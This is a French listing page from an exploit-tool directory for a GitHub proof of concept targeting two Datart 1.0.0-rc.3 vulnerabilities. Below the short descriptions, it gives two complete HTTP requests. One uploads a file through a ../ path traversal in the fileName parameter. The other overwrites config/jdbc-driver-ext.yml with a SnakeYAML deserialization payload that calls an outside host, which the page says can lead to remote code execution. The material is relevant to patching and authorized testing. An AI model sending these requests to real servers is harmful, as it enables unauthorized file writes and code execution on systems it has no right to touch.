Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-56815 — Datart 1.0.0-rc.3 est vulnérable à une traversée de répertoire dans l'interface POST /viz/image, car le serveur utilise directement MultipartFile.transferTo() pour enregistrer le fichier téléversé vers un chemin contrôlable par l'utilisateur, et ne procède pas à une vérification stricte du nom de fichier. | Kitploit
Outils/GitHubGitHub/xiaoxiaoranxxx/cve-2025-56815
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionMauvaise Configuration
GitHubxiaoxiaoranxxx/cve-2025-56815

CVE-2025-56815

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

5il y a 11 moisPas encore vérifié

Datart 1.0.0-rc.3 est vulnérable à une traversée de répertoire dans l'interface POST /viz/image, car le serveur utilise directement MultipartFile.transferTo() pour enregistrer le fichier téléversé vers un chemin contrôlable par l'utilisateur, et ne procède pas à une vérification stricte du nom de fichier.

Partager

CVE-2025-56815

Datart 1.0.0-rc.3 est vulnérable à un traversement de répertoire (Directory Traversal) dans l'interface POST /viz/image, car le serveur utilise directement MultipartFile.transferTo() pour enregistrer le fichier téléversé dans un chemin contrôlable par l'utilisateur, sans vérification stricte du nom de fichier.

root@kitploit:~
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../../../../tmp/1 HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646

------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

xxxxx
------WebKitFormBoundarySInMdoLRiubl32BW--

CVE-2025-56816

Datart 1.0.0-rc. 3 est vulnérable à un traversement de répertoire (Directory Traversal). La gestion des fichiers de configuration de l'application permet aux attaquants de téléverser des fichiers YAML arbitraires vers le chemin config/jdbc-driver-ext. yml. L'application analyse ce fichier à l'aide des méthodes non sécurisées load() ou loadAs() de SnakeYAML, sans assainissement des entrées. Cela permet la désérialisation de contenu YAML contrôlé par l'attaquant, conduisant à l'instanciation de classes arbitraires. Sous certaines conditions, cela peut être exploité pour obtenir une exécution de code à distance (RCE).

root@kitploit:~
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../config/jdbc-driver-ext.yml HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646

------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

{!!java.net.URL ["http://test.eyes.sh/"]: 1}
------WebKitFormBoundarySInMdoLRiubl32BW--
Télécharger l’outil